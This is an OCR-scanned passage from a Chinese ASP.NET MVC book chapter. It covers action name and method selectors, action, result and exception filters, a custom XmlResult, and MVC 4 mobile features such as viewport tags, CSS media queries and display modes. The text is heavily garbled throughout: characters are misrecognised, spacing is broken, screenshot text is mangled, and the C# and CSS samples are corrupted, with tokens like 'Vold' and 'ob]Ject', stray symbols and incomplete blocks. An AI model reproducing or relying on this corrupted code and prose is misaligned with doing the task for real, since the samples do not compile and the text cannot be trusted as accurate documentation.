ASPNET MVC 通过 两 种 机 制 来 影响 操作 的 选择 : 选择 操作 名 称 和 选择 (过 滤 的 ) 操 作 
方法 。 
1. 用 名 称 选择 器 选择 操作 和 名称 
重合 名 操作 可 以 通过 派生 于 基 类 ActionNameSelectorAttribute 的 特性 来 处 理 。 操 作 名 称 
选择 的 最 常见 用 法 是 通过 ASPNET MVC 框架 附带 的 [ActionName] 特 性 。 该 特性 允许 用 户 
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指定 一 个 奉 代 名 称 ， 并 将 指定 的 奉 代 名 称 直接 附加 到 操作 方法 本 贞 。 需 要 更 加 动态 名 称 映 
射 的 开发 人 员 可 以 实现 派生 于 ActionNameSelectorAttribute 的 自 定 义 特性 。 
实现 ActionNameSelector 是 一 项 简单 任务 : 实现 IsValidName 抽象 方法 ， 并 返回 true 
或 false， 以 判断 请 求 的 名 称 是 否 有 效 。 由 于 允许 操作 名 称 选 择 器 对 一 个 名 称 是 否 有 效 进行 
投票 ， 因 此 可 以 延迟 到 知道 请 求 的 名 称 后 再 作出 决定 。 例 如 ， 如果 想 要 一 个 可 以 处 理 任 何 
以 “product- ”开头 的 操作 (可 能 是 用 来 映射 某 个 不 能 控制 的 现 有 URIL)。 通 过 实现 一 个 目 定 
义 的 名 称 选择 器 ， 可 以 非常 轻松 地 实现 这 一 操作 : 
public override bool IsValidName (ControllerContext controllerContext, 
string actionName, 
MethodInfo methodInfo) { 


return actionName.StartsWith ("product—");} 


} 


当 把 该 新 特性 应 用 到 一 个 操作 方法 时 ， 它 可 以 啊 应 以 “product-” 开 头 的 任何 操作 。 操 作 
仍然 需要 做 很 多 实际 操作 名 称 的 解析 工作 来 提取 和 额外 的 信息 。 在 ~/Areas/ActionNameSelector 
的 代码 中 有 这 样 一 个 例子 ， 其 中 包括 来 日 操作 名 称 的 产品 马 的 解析 并 把 解析 出 的 值 放 入 
路 由 数据 中 ， 以 便 开 发 人 员 以 后 对 该 值 进行 模型 绑 定 。 


2. 使 用 方法 选择 器 过 滤 操 作 


另 一 个 操作 选择 扩展 是 过 滤 堪 操作 。 方 法 选择 器 是 派生 目 ActionMethodSelectorAttribute 
的 一 个 特性 类 。 与 操作 名 称 选 择 非 常 类 似 ， 它 涉及 了 一 个 抽象 方法 ， 该 方法 可 用 来 检查 控 
制 器 上 下 文 和 方法 ， 并 判断 该 方法 是 否 符合 请 求 要 求 。ASPNET MVC 框架 提供 了 该 特性 
的 几 个 内 置 实现: [AcceptVerbs]( 以 及 与 它 相 近 的 相关 特性 [HttpGet]、 [HttpPost]、 [HttpPut]、 
[HttpDelete]、[HttpHead]、[HttpPatch]、[HttpOptions] 等 ) 和 [NonAction]。 

如 果 当 ASPNET MVC 调用 它 的 IValidForRequest 方法 时 ， 方 法 选择 器 返回 了 false， 
那么 对 于 给 定 请 求 来 说 ， 该 方法 则 不 被 认为 是 有 效 的 ， 系 统 会 继续 查找 匹配 。 如 果 这 个 方 
法 没有 选择 器 ， 那 么 它 就 会 被 考虑 成 潜在 的 有 效 调度 目标 ; 相反 ， 如 果 方 法 有 一 个 或 多 个 
选择 器 ， 它 们 通过 返回 true 都 会 同意 该 方法 是 一 个 有 效 的 目标 。 

如 果 找 不 到 匹配 方法 ， 那 么 系统 束 会 在 对 请 求 的 啊 应 中 ， 返 回 一 个 HITP 404 错误 代 
码 。 同 样 ， 如 果 有 多 个 方法 匹配 请 求 ， 系 统 将 返回 一 个 HITP 500 错误 代码 ， 并 在 错误 页 
面 上 告知 方法 匹配 存在 二 义 性 。 

为 什么 [Authorize] 没 有 出 现在 前 面 的 列表 中 呢 ? 因为 [Authorize] 的 正确 操作 要 么 人 允许 
请 求 ， 要 么 返回 一 个 HTTP 401(“ 未 经 授权 ”) 错 误 代码 ， 以 便 浏览 器 知道 我 们 需要 身份 验 
证 。 另 一 种 考虑 是 ， 对 于 [AcceptVerbs] 或 [NonAction]， 最 终 用 户 不 能 使 请 求 有 效 ， 它 总 是 
无 效 的 ,因为 它 使 用 了 错误 的 HITP 动词 ,或 者 试图 调用 一 个 非 操 作 的 方法 ,然而 [Authorize] 
允许 最 终 用 户 做 一 些 处 理 ,， 最 终 使 请 求 成 功 。 这 便 是 操作 过 滤器 ( 像 [Authorize]) 和 方法 选择 
堪 ( 像 [AcceptVerbsh) 的 关键 区 别 。 

使 用 目 定 义 方法 选择 器 的 一 个 例子 便 是 区 分 Ajax 请 求 和 非 Ajax 请 求 。 我 们 可 以 使 用 
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新 的 IsValidForRequest 方法 实现 一 个 新 的 [AjaxOnly] 操 作 方 法 选择 器 ， 人 代码 如 下 : 


public override bool IsValidForRequest (ControllerContext controllerContext, 
MethodInfo methodIinfo) { 
return controllercontext .HttpContext .Request.IsAjaxRequest () ; 
} 


通过 我 们 Ajax 的 例子 ， 结 合 方法 选择 右 存 在 与 否 的 规则 ,我们 可 以 得 出 结论 ， 没有 装 
饰 的 操作 方法 都 是 Ajax 和 非 Ajax 请 求 的 有 效 目 标 。 当 请 求 是 一 个 非 Ajax 请 求 时 ， 使 用 
AjaxOnly 特性 装饰 方法 都 会 从 有 效 目 标 列 表 中 过 滤 掉 。 

使 用 像 这 样 的 一 个 特性 ， 我 们 可 以 创建 拥有 相同 名 称 的 独立 操作 方法 ， 创 建 的 这 些 方 
法 可 以 根据 用 户 是 在 浏览 右 中 做 直接 请 求 ， 还 是 在 做 编程 性 的 Ajax 请 求 来 派遣。 我 们 可 能 
根据 用 户 是 在 做 一 个 完整 的 请 求 还 是 在 做 一 个 Ajax 请 求 来 选择 做 不 同 的 工作 。 我 们 可 以 在 
~/Areas/ActionMethodSelector 中 找到 这 样 一 个 完整 示例 ， 其 中 包含 了 [AjaxOnly] 特 性 的 实 
现 , 并 展示 了 系统 根据 用 户 是 做 完整 请 求 还 是 做 Ajax 请 求 而 在 两 个 mdex 方法 之 间 做 出 选 
择 的 控制 费 和 视图 的 实现 。 


-个 操作 方法 一 旦 被 选中 束 会 立即 执行 ， 并 且 如 果 它 返回 一 个 结果 ， 返 回 的 结果 也 会 
随后 执行 。 操 作 过 滤器 允许 开发 人 员 以 4 种 方式 参与 操作 和 结果 执行 管道 : 授权 、 操 作 前 
后 处 理 、 结 果 前 后 处 理 和 错误 处 理 。 

操作 过 滤器 可 以 作为 直接 应 用 于 操作 方法 或 控制 器 类 的 特性 来 编写 ， 或 者 作为 在 全 局 
过 滤器 列表 中 注册 的 单独 类 来 编 与 。 如 果 打 算 将 编写 的 操作 过 波峰 作为 特性 来 使 用 ， 那 么 
它 必 须 继 承 目 FilterAttribute 或 者 它 的 任何 子 类 ， 如 ActionFilterAttribute。 不 作为 特性 使 用 
的 全 局 操作 过 滤器 没有 对 这 个 基 类 的 要 求 。 无 论 采 取 哪 个 路 由 ， 操 作 过 滤器 文 持 的 过 滤 活 
动 都 由 实现 的 接口 决定 。 


1. 授权 过 滤器 


参与 授权 的 操作 过 小姑 珊 要 实现 IAuthorizationFilter 接口 。 授 权 过 浪费 在 操作 管道 中 的 
执行 非常 早 ， 所 以 它们 很 适合 用 来 短路 整个 操作 的 执行 。 ASPNET MVC 框架 中 有 一 些 类 实现 
丁 该 接口 ， 其 中 包括 [Authorize]、 [ChildActionOnly]、 [RequireHttps]、 [ValidateAntiForgeryToken| 
和 [ValidateInput] 等 。 

开发 人 员 可 能 会 选择 实现 授权 过 滤器 ， 以 实现 当 茶 个 先决 条 件 不 能 满足 时 或 者 希望 结 
果 不 是 返回 HITP 404 错误 代码 时 ， 从 操作 管道 中 提前 跳出 。 


2. 操作 和 结果 过 滤器 

参与 操作 前 后 处 理 的 操作 过 滤器 需要 实现 IActionFilter 接口 ， 该 接口 提供 了 两 个 需要 
实现 的 方法 : OnActionExecuting( 用 于 前 处 理 ) 和 OnActionExecuted( 用 于 后 处 理 )。 同 样 ， 参 
与 结果 前 后 处 理 的 操作 过 滤器 需要 实现 IResultFilter 接口 和 它 的 两 个 过 滤器 方法 : 
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OnResultExecuting 和 OnResultExecuted。ASPNET MVC 框架 本 身 提 供 了 两 个 操作 /结果 过 
滤 右 : [AsyncTimeout] 和 [OutputCache]。 单 个 操作 过 滤 右 经 党 把 这 两 个 接口 作为 一 对 儿 来 
实现 ， 因 此 ， 把 它们 放 在 一 块 儿 介 绍 是 很 有 意义 的 。 

输出 缓存 过 滤器 是 应 用 这 对 操作 和 结果 过 小 右 的 典型 示例 。 它 重 写 了 OnActionExecuting 
方法 来 决定 它 是 否 已 经 有 一 个 缓存 结果 ， 从 而 可 以 绕 过 操作 和 结果 的 执行 ， 而 直接 从 它 的 
绥 存 中 返回 一 个 结果 。 它 也 实现 了 OnResultExecuted 方法 ， 这 样 它 可 以 “挽救 ”一 个 尚未 
绥 存 的 操作 和 结果 的 执行 结果 。 

作为 一 个 示例 ， 让 我 们 看 下 ~/Areas/TimingFilter 中 的 代码 。 这 是 一 个 记录 操作 和 结果 
执行 时 间 的 操作 和 结果 过 小 器 ， 实 现 的 4 个 重 写 方法 如 下 所 示 : 


public Vold OnActionExecuting (ActionExecutingContext filtercCcontext) 


{ 
GetStopwatch("action") .Start (); 
} 
public Vold OnActionExecuted (ActionExecutedContext filterContext) 
{ 
GetStopwatch ("action") .Stop(}); 
} 
public Vold OnResultExecuting (ResultExecutingContext filterContext) 
{ 
GetStopwatch("result") .Start (); 
} 
public Vold OnResultExecuted (ResultExecutedContext filterContext) 
{ 
var resultSstopwatch = GetStopwatch ("result™);} 
resultstopwatch.stop(); 
Var actionstopwatch = GetStopwatch ("action” ); 
var response = filterContext.HttpContext.Response; 
if (!filterContext.IsChildAction && response.ContentType == 
"text/html"™") 
response .Write'l 
string.Format ( 
"<ho>Action {0} :: {1}, Execute: {2}ms, Result: 
{3}ms .</h5>", 
filterContext.RouteData.Values["controller™|, 
filterCcontext.RouteData.Values|[" -actlIon ”| ， 
actionstopwatch.ElapsedMilliseconds, 
resultstopwatch.ElapsedMilliseconds 
) 
); 
} 


上 而 的 示例 中 使 用 了 .NET 的 Stopwatch 类 的 两 个 实例 ， 一 个 用 于 操作 执行 ， 另 一 个 用 
于 结果 执行 。 当 执行 完毕 时 ， 它 会 癌 输 出 流 中 退 加 一 些 HIML 标记 ， 以 使 我 们 能 够 精确 地 
看 到 执行 代码 所 伦 费 的 时 间 。 
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3. 异常 过 滤器 


可 利用 的 最 后 一 种 操作 过 小 器 是 异常 过 小 器， 用 来 处 理 操作 或 结果 执行 期 间 可 能 抛 出 
的 异 第 。 参 与 异种 处 理 的 操作 过 滤器 需要 实现 正 xceptionFilter 接口 。ASPNET MVC 框架 
只 提供 了 一 个 异常 过 滤 右 : [HandleError]。 

开发 人 员 经 常 使 用 异常 过 小 右 来 记录 错误 的 日 志 、 发 出 系统 管理 员 的 通知 以 及 从 最 终 用 
户 的 角度 选择 处 理 错 误 的 方法 (通常 通过 给 用 户 发 送 错误 页 面 的 方式 )。HandleErrorAttribute 
类 可 以 做 上 述 最 后 的 操作 ， 因 此 通过 继承 HandleErrorAttribute 类 来 创建 异种 过 滤器 特性 是 
非常 常见 的 ， 当 然 创 建 的 新 特性 需要 重 写 OnException 方法 以 在 调用 base.OnException 之 
前 做 一 些 额外 的 处 理 。 


14.3.3 ”提供 目 定 义 结果 


大 部 分 操作 方法 的 最 后 一 行 代码 都 会 返回 一 个 操作 结果 对 象 。 例 如 ，Controller 类 上 的 
View 方法 返回 ViewResult 的 一 个 实例 , 其 中 包含 查找 视图 的 必要 代码 , 执行 该 结果 并 将 执 
行 结果 写 入 到 啊 应 流 中 。 当 在 操作 方法 中 编写 “retum View0;” 时 ， 就 是 请 求 ASPNET MVC 
框架 目 动 执行 一 个 视图 结果 。 

作为 一 名 开发 人 人员， 我们 不 能 仅 限于 ASPNET MVC 框架 提供 的 操作 结果 。 我 们 可 以 
通过 继承 类 ActionResult 并 实现 其 中 的 ExecuteResult 方法 来 编写 目 己 的 操作 结果 。 


为 什么 要 有 操作 结果 ? 


泻 染 视图 吗 ? 只 能 让 它 的 视图 方法 做 正确 的 事 吗 ? 
前 两 章 介绍 了 一 些 相关 主题 ， 依赖 注入 和 单元 测试 。 这 些 章节 都 谈 到 了 良好 软件 设计 
的 重要 性 。 这 种 情况 下 ， 操 作 结 果 起 到 了 非常 重要 的 作用 : 
e ”Controller 类 是 提供 了 方便 性 , 但 它 不 是 ASPNET MVC 框架 的 核心 部 分 .从 ASPNETMVC 
运行 时 的 角度 来 看 ,重要 的 类 型 是 IController; 我 们 只 需要 理解 它 是 ASPNET MVC 
中 的 控制 右 或 使 用 ASPNET MVC 中 的 控制 器 即 可 。 所 以 明显 的 是 ， 把 演 染 的 视图 


逻辑 放 入 Controller 类 中 将 会 使 在 其 他 地 方 重用 该 逻辑 更 加 困难 。 此 外 ， 不 管 泻 染 视 


图 是 不 是 控制 右 的 工作 ， 它 都 必须 知道 如 何 演 染 视图 吗 ? 这 里 使 用 的 原则 是 单一 
职责 原则 (Single Responsibility Principle)。 控 制 融 应 该 只 集中 于 必要 的 操作 。 

e 我 们 布 望 在 整个 框架 中 局 用 好 的 单元 测试 。 通过 使 用 操作 结果 类 ,我们 可 以 使 开 
发 人 员 编 写 能 够 直接 调用 操作 方法 的 单元 测试 ， 还 可 以 检查 操作 结果 的 返回 值 。 
相对 于 从 演 染 视图 可 能 生成 的 HIML 中 挑选 来 说 , 对 一 个 操作 结果 的 参数 进行 单 
元 测试 还 是 要 简单 很 多 。 


在 有 关 ~/Areas/CustomActionResult 的 示例 中 ， 我 们 有 一 个 XML 操作 结果 类 ， 用 来 将 
一 个 对 象 序列 化 为 XML 格式 表示 ， 并 把 它 作 为 啊 应 发 送 给 客户 端 。 在 完整 的 示例 代码 中 ， 
我 们 有 一 个 在 控制 右 内 被 序列 化 的 目 定义 Person 类 : 
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public ActionResult Index() 1{ 
Var model = new Person 1{ 
FirstName = "Brad", 
LastName = "Wilson"™, 
Blog = "http://bradwilson.typepad.com" 
}; 


return new XmlResult (model):; 
} 
XmlResult 类 的 实现 依赖 于 .NET 框架 内 置 的 XML 序列 化 能 力 : 
public class XmlResult : ActionResult |{ 


private object data; 


Public XmlResult (ob]Ject data) 1{ 
this.data = data; 
} 


public override Vold ExecuteResult (ControllerContext context) { 
var serializer = new XmlSerializer (data.GetType ()) 7 
Var response = context.HttpContext.Response .Outputstream; 


context .HttpContext.Response.ContentType = "text/xml™"; 
serializer.Serialize (response, aatal :; 


14.4 “小结 


章 介 绍 了 ASPNET MVC 框架 中 的 一 些 高 级 扩展 。 根 据 它们 扩展 的 目标 是 模型 、 视 
图 还 是 控制 器 (和 操作 )， 可 以 把 这 些 扩展 大 致 分 为 三 类 。 对 于 模型 ， 我 们 应 该 理解 值 提供 
器 和 模型 绑 定 器 的 内 部 工作 原理 ， 掌 握 如 何 通过 使 用 模型 元 数据 和 模型 验证 器 来 扩展 
ASPNET MVC 处 理 模 型 编辑 的 方式 。 视 图 扩展 部 分 介绍 了 如 何 自 定义 视图 引擎 来 提供 上 自 
己 定 位 视图 文件 的 规则 ， 同 时 也 讲解 了 在 视图 中 生成 HTML 标记 辅助 方法 的 两 个 变量 。 最 
后 ， 我 们 通过 使 用 操作 选择 器 、 操 作 过 滤器 和 自 定义 操作 结果 类 型 学 习 了 控制 器 扩展 ， 它 
为 设计 独特 的 连接 模型 和 视图 的 操作 提供 了 强大 而 灵活 的 方法 。 这 些 扩展 可 以 帮助 我 们 把 
ASPNET MVC 应 用 程序 的 功能 和 重用 性 提升 到 更 高 一 级 的 水 平 , 同 时 也 使 得 ASPNET MVC 
应 用 程序 更 容易 理解 、 调 试 和 增强 。 
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局 级 主 


本 章 主要 内 容 
e 移动 文 持 
e 出 级 Razor 
e 高 级 路 由 
e 高 级 模板 
e 和 高 级 控制 右 


在 前 面 介 绍 ASPNET MVC 基础 内 容 时 ， 为 了 避免 迷失 方 回 ， 我 们 对 许多 非常 “ 酷 ” 
的 高 级 主题 都 是 一 笔 带 过 。 但 是 ， 现 在 是 我 们 学 习 它 们 的 时 候 了 。 


15.1 移动 支持 


使 用 移动 设备 浏览 网 站 现在 变 得 越 来 越 普遍 。 一 些 估 计 显 示 ， 移 动 设 备 占 网 络 流量 的 
20%， 并 在 逐年 攀升 。 网 站 能 够 在 移动 设备 上 使 用 和 浏览 显得 越 来 越 重 要 。 

目前 有 各 种 各 样 的 方法 可 以 提高 网 站 应 用 程序 的 移动 体验 。 在 某 些 情况 下 ， 我 们 只 是 
想 在 小 规格 上 做 一 些微 小 的 风格 变化 。 在 其 他 一 些 情况 下 ， 我 们 可 能 完全 改变 外 观 显 示 或 
者 一 些 视图 的 内 容 。 在 最 极端 的 情况 下 (在 移动 Web 程序 迁移 到 本 地 移动 程序 之 前 )， 我 们 
可 能 想 重新 创建 一 个 专门 针对 移动 用 户 的 Web 应 用 程序 。 针 对 这 些 情况 ，MVC 4 提供 了 

e 适应 性 呈现 : 默认 的 Intemet 和 Intranet 应 用 程序 模板 使 用 CSS 媒体 查询 (CSS media 

queries) 来 缩小 到 较 小 的 移动 规格 (mobile form factors)。 
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e 显示 模式 : MVC 4 采用 了 基于 约定 的 方法 ， 这 样 就 可 以 根据 发 出 请 求 的 浏览 器 选 
择 不 同 视图 。 与 适应 性 呈现 不 一 样 的 是 ， 显 示 模 式 允 许 我 们 改变 发 往 移动 浏览 器 的 
标记 。 

e Mobile Project 模板 : 这 个 新 的 项 目 模板 帮助 我 们 创建 只 针对 移动 设备 使 用 的 Web 


移动 设备 模拟 器 


本 节 的 截屏 使 用 Windows Phone Emulator， 下 载 网 址 为 http://msdn.microsoft.com/en- 
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us/library/1{402563.aspx。 

笔者 鼓励 答 试 其 他 一 些 移动 设备 模拟 器 ， 比 如 Opera Mobile Emulator( 下 载 网址 为 
http:Wwww.opera.comydevelopertools/mobile/), 或 针对 iPhone 和 iPad 浏览 器 的 Electric Plum 
Simulator( 下 载 网 址 为 http://www.electricplum.com)。 


15.1.1 适应 性 呈现 


改善 网 站 移动 体验 的 第 一 步 是 在 移动 浏览 右 中 浏览 网 站 。 图 15-1 展示 了 MVC 3 默认 
模板 的 主页 ， 图 中 使 用 的 是 Windows Phone Emulator。 

图 中 展示 的 外 观 中 存在 很 多 问题 : 

e 大 量 的 文本 不 是 默认 缩放 级 别 上 的 可 读 文 本 。 

e 标题 中 的 导航 链接 无 法 使 用 。 

e 缩放 没有 真正 起 到 作用 ， 由 于 内 容 不 回流 ， 我 们 只 能 浏览 页 面 的 一 小 部 分 。 

这 仅 是 简单 罗列 了 一 个 简单 页 面 。 

半 好 ，MVC 4 默认 模板 在 移动 浏览 器 中 做 了 很 多 处 理 ， 我 们 不 用 做 这 些 额外 的 工作 ， 
如 图 15-2 所 示 。 


Tm learmn mre abewt A NET MA wesit 
hipasn. nem Tie pope leatures 
i 腹面 


iy tins about 内 于 六 下 让 WEC wisil mar 


各 num ， 


We suggest the following: 
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显而易见 ， 页 面 智能 地 根据 移动 设备 屏幕 太 寸 进行 缩放 ， 而 不 是 简单 地 缩小 页 面 (收缩 
文本 及 其 他 所 有 元 素 )。 为 了 能 在 移动 设备 上 使 用 ， 页 面 进行 了 重 绘 。 

不 明显 的 是 ， 为 了 优化 尺寸 ， 页 面 布 局 在 小 尺寸 上 进行 了 微妙 调整 。 下面 是 标题 区 的 

- 些 例子 : 
e logo 在 果 面 视图 上 是 左 对 齐 ， 而 在 移动 视图 中 是 居中 。 
e 在 果 面 视图 中 ， 注 册 / 登 录 链 接 都 在 右上 方 对 齐 ， 而 在 移动 视图 中 ， 都 在 logo 下 方 
居中 。 

e Home/About/Contact 链接 都 在 移动 视图 中 排 开 。 

问 下 滚动， 我 们 就 会 看 到 其 他 使 页 面 紧 凑 的 简化 移动 视图 ， 这 样 就 可 以 最 大 限度 地 利 
用 屏 莫 。 虽 然 这 些 变 化 都 是 细微 的 ,但 它们 的 影响 却 是 巨大 的 。 例 如 ， 有 删除 了 “We suggest 
the following” 列 表 中 的 圆 形 项 目 符 号 图 标 ， 页 面 文本 居中。 单 击 标题 中 的 Register 链接 显 
示 的 页 和 面 展示 出 表单 学 段 对 于 移动 设备 是 大 小 合适 的 ， 如 图 15-3 所 示 。 


Register. Create a new 
accOUNt. 


User name 


Pasaword 


Confirm password 


图 15-3 

这 些 模板 就 是 通过 适应 性 呈现 实现 根据 页 面 宽度 目 动 调整 页 而 大小。 

请 注意 ， 这 里 不 是 说 应 用 程序 根据 标题 或 其 他 线索 猜测 用 户 是 否 使 用 移动 设备 来 对 页 
面 进 行 缩放 。 人 恰恰 相反 ， 页 面 利 用 的 是 两 个 普遍 文 持 的 浏览 器 功能 : Viewport 元 标记 
(Viewport meta tag) 和 CSS 媒体 查询 。 

1. Viewport 元 标记 

创建 的 大 部 分 网 页 都 没有 考虑 到 在 小 规格 屏幕 上 如 何 显示 ， 为 了 很 好 显示 这 些 页 面 ， 
移动 浏览 帮 已 经 努力 了 很 长 时 间 。 主 要 关注 于 语义 结构 内 容 设 计 的 网 站 可 以 考虑 格式 化 ， 
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而 使 这 些 文 本 具有 可 读 性 ， 但 那些 刚性 视觉 导 回 设计 的 网 站 束 没 那么 羊 运 了 了 了， 这些 网 站 需 
要 用 缩放 和 和 平移 来 处 理 。 

由 十 多 数 网 站 不 能 很 好 地 扩展 ， 因 此 移动 浏览 融通 党 在 推测 如 何 安全 地 泻 染 通常 失败 
的 页 面 ， 并 使 用 缩放 和 平移 风格 进行 渲染 。 解 决 这 个 问题 的 方法 是 告诉 浏览 如 我 们 的 设计 
尺寸 ， 让 它 不 要 推测 。 

通常 情况 下 ， 基 于 浏览 器 嗅 探 或 用 户 选 择 ，Viewport 标记 只 在 那些 专门 为 小 规格 设计 
的 页 和 面 中 使 用 。 这 种 情况 下 ， 我 们 按 如 下 方式 使 用 Viewport 标记 : 


<meta name="viewport" content="width=320"> 


这 样 就 可 适用 于 移动 视图 ， 但 不 适用 于 大 尺寸 页 面 。 
个 更 好 的 解决 方案 是 把 我 们 的 CSS 扩展 到 各 种 规模 (更 多 的 是 在 第 二 种 规模 )， 然 后 
告诉 浏览 器 Viewport 支持 任意 设备 。 可 喜 的 是 ， 这 种 方案 非常 容易 实现 。 
<meta name="viewport" content="Wwidth=device-width"> 


2. 使 用 CSS 媒体 查询 的 自 适应 样式 


我 们 已 经 告诉 浏览 器 ， 我 们 的 页 面 足够 智能 ， 可 以 缩放 到 当前 设备 的 屏幕 尺寸 。 这 是 
-个 大 胆 承诺 ! 我 们 将 如 何 总 现 这 一 承 诡 呢 ? 答案 是 CSS 媒体 查询 。 
CSS 媒体 查询 允许 我 们 在 特定 的 媒体 (显示 ) 功 能 指定 CSS 规则 。 下 面 内 容 摘 目 W3C 
Media Queries 文档 : 


目前 ，HTMIL4 和 CSS2 支持 与 媒体 相关 的 样式 表 , 这 些 样式 表 专 为 不 同 的 媒体 类 型 制 
作 。 例如， 一 个 文件 可 能 在 屏幕 上 显示 时 使 用 sans-serif 字体 ,使 用 打印 机 打印 时 使 用 serif 
字体 .“ 屏 幕 ” 和 “打印 ”是 已 经 定义 的 两 种 不 同 媒体 类 型 。 媒 体 查询 通过 使 用 更 精确 的 样 
式 表 标签 扩展 了 媒体 类 型 的 功能 。 

媒体 查询 由 一 个 媒体 类 型 和 察 个 或 多 个 检查 特定 媒体 功能 条 件 的 表达 式 组 成 。 在 这 些 
媒体 功能 中 ， 能 在 媒体 查询 中 使 用 的 功能 有 '"width'"，'height' 和 'color'"。 通 过 使 用 媒体 查询 ， 
演示 文稿 可 在 不 改变 自身 内 容 的 情况 下 适用 于 特定 范围 的 输出 设备 。 

——http:/www.w3.0rg/TR/css3-mediaquerles/ 


尽管 我 们 在 CSS2 中 可 以 使 用 目标 媒体 类 型 ， 比 如 屏幕 和 打印 ， 但 是 我 们 可 以 在 媒体 
查询 中 指定 屏幕 显示 的 宽度 范围 。 

请 记 住 ，CSS 规则 进行 目 上 而 下 的 评估 ,这样 我 们 就 可 以 在 CSS 文件 的 顶部 应 用 一 般 
的 规则 ， 并且 可 以 用 专门 在 CSS 中 进行 小 规格 显示 的 规则 进行 重 写 ， 并 用 媒体 查询 环 统 这 
些 规 则 ， 以 使 它们 不 能 在 大 规格 显示 的 浏览 器 中 使 用 。 

下 面 列举 一 个 非常 简单 的 示例 ， 当 在 宽度 大 于 850px 的 屏幕 上 显示 时 ， 背 景 是 蓝 色 ; 
当 在 宽度 小 于 850px 的 屏幕 上 显示 时 ， 背 景 是 红色 : 


body {background—-color:blue;} 
QQmedia only screen and (max-width: 850px) 1 
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body {background-color:red;} 
} 


这 是 CSS 在 默认 ASPNET MVC 4 模板 中 的 工作 原理 : 移动 规格 规则 遵照 一 般 的 规则 ， 
由 一 个 850px 的 max-width 媒体 得 询 来 监管 。 想 看 这 部 分 代码 ， 请 查看 Mobile Style 节 中 
的 /Content/Site.css 文件 。 


媒体 查询 : 为 什么 在 第 一 个 就 停止 

在 我 们 网 站 的 CSS 中 , 我 们 可 以 使 用 各 种 媒体 衣 询 来 确保 网 站 在 各 种 屏幕 尺寸 上 以 美 
观 的 形式 显示 ,从 狭小 的 手机 浏览 器 到 巨大 的 宽屏 显示 右 ， 以 及 二 者 之 间 的 所 有 尺寸 设备 。 
网 站 http://mediaqueri.es/ 提 供 的 站 点 库 ， 显 示 这 种 方法 的 强大 作用 。 


如 果 细 心 , 我 们 就 会 想到 在 时 面 上 把 浏览 器 宽度 调整 到 低 于 850px 来 测试 这 一 功能 (如 
图 15-4)， 这 个 想法 是 正确 的 。 


Reqgister Loa in 


Home About Contact 


Getting Started 
ASP.NET MYC gves you a powertul pattems-based way to build dynamic websites that enables a 
chean separation of concerns over markup for enjoyable, agile 
1 features that enable fast TDD-friendhy developnvent for 
creating sophisticated applications that use the latest web standards. Laeam more 


Add NuGet packages and jump-start your coding 
NuGet makes it easy to install and update free libraries and tools. Leam more.. 


Find Web Hosting 
You can easily find a web hosting company that offers the nght mix of features and price for your 
applications. Learn mMore.. 


图 15-4 


我 们 可 以 很 容易 地 测试 这 一 功能 ， 而 不 用 编写 任何 代码 : 使 用 Interet 应 用 程序 模板 
创建 一 个 MVC 4 项目， 运行 ， 然 后 调整 浏览 器 大 小 。 
尽管 没有 建立 在 MVC 4 应 用 程序 默认 的 布局 和 样式 之 上 ， 我 们 仍然 可 以 用 它们 问 己 
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有 的 Web 应 用 程序 中 添加 一 些 基 本 的 自 适 应 布局 。 

适应 性 呈现 可 以 实现 向 每 个 浏览 器 发 送 同 样 的 标记 , 使 用 CSS 可 以 改换 或 触发 指定 元 
素 的 样式 。 在 某 些 应 用 中 ,这 是 远 远 不 够 的 : 我 们 需要 改变 发 送 到 所 有 移动 浏览 器 的 标记 。 
这 才 是 显示 模式 的 用 武之 地 。 


15.1.2 显示 模式 


MVC 4 中 的 视图 选择 逻辑 已 经 改变 , 添加 了 基于 约定 的 蔡 代 视图 。 当 浏览 器 用 户 代 理 
显示 是 一 个 已 知 的 移动 设备 时 ， 默 认 的 视图 引擎 首先 查找 名 称 以 .Mobile.cshtml 结尾 的 视 
图 。 例 如 ， 当 时 和 面 浏览 如 请 求 主页 时 ， 应 用 程序 就 用 Views\Home\Index.cshtml 模板 ， 而 当 
移动 浏览 器 请 求 主页 时 , 程序 就 会 使 用 Views\Home\Index.Mobile.cshtml 模板 ， 而 不 使 用 日 
和 面 视图 。 这 些 都 由 约定 来 处 理 。 我 们 不 必 配 置 或 注册 。 

为 了 测试 这 一 功能 ， 我 们 首先 使 用 Internet 应 用 程序 模板 创建 一 个 MVC 4 应 用 程序 。 
然后 拷贝 \Views\Home\Index.cshtml 模板 ， 在 解决 方案 资源 管理 器 (Solution Explorer) 中 选中 
\Views\Home\Index.cshtml 模板 ， 按 快捷 键 CtrlIHC， 有 再 按 CtrlHV。 并 将 这 个 视图 重 命 名 为 
Index.Mobile.cshtml， 这 时 就 出 现 了 Views\Home 目录 ， 如 图 15-5 所 示 。 

编辑 Index.Mobile.cshtml 视图 ， 修 改 页 而 标题 : 

<hgroup class="title" > 

<h1>HELLO VALUED MOBILE USER!</h1> 


<h2>@ViewBag.Message</h2> 
</hgroup> 


运行 应 用 程序 ， 在 移动 模拟 需 中 碍 看 新 视图 ， 如 图 15-6 所 示 ， 
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第 15 章 高 级 主题 
1. 布局 和 部 分 视图 支持 


也 可 以 创建 布局 和 部 分 视图 模板 的 移动 版 本 。 

如 果 Views\Shared 文件 夹 中 包含 Layout.cshtml 和 Layout.mobile.cshtml 模板 ， 那 么 在 
默认 情况 下 ， 应 用 程序 会 对 来 自 移 动 浏 贤 器 的 请 求 使 用 Layout.mobile.cshtml 模板 ， 对 其 
他 的 请 求 使 用 _Layout.cshtml 模板 。 

如 果 Views\Account 文件 夹 中 包含 SetPasswordPartial.cshtml 和 SetPasswordPartial. 
mobile.cshtml， 那 么 对 于 来 目 移 动 浏览 器 的 请 求 ， 合 令 @Html.Partial("~/Views/Account/ 
_SetPasswordPartial") 会 泻 染 SetPasswordPartial.mobile.cshtml， 而 对 于 其 他 请 求 ， 该 命令 会 
泻 染 SetPasswordPartial.cshtml。 


2. 自 定义 显示 模式 


另外 ， 我 们 可 以 注册 基于 目 定 义 准 则 的 设备 模式 。 例 如 ， 针 对 用 于 Windows Phone 设 
备 ， 以 .WinPhone.cshtml 结尾 的 视图 模板 ， 我 们 可 以 注册 一 个 WinPhone 设备 模式 。 在 
Global.asax 的 Application Start 方法 中 编写 如 下 代 体 : 


DisplayModeProvider.Instance.Modes.Insert (0, new DefaultDisplayMode ("WinPhone"™) 
{ 


ContextCondition = (context => context.GetOverriddenUserAgent () .IndexOf 
("Windows Phone OS", StringComparison.ordinallIgnoreCase) >= 0) 
1)s 
浴 加 完 代 码 之 后 即 完成 注册 。 我 们 不 需要 其 他 额外 的 配置 和 注册 。 此 时 ， 如 采 创 建 了 
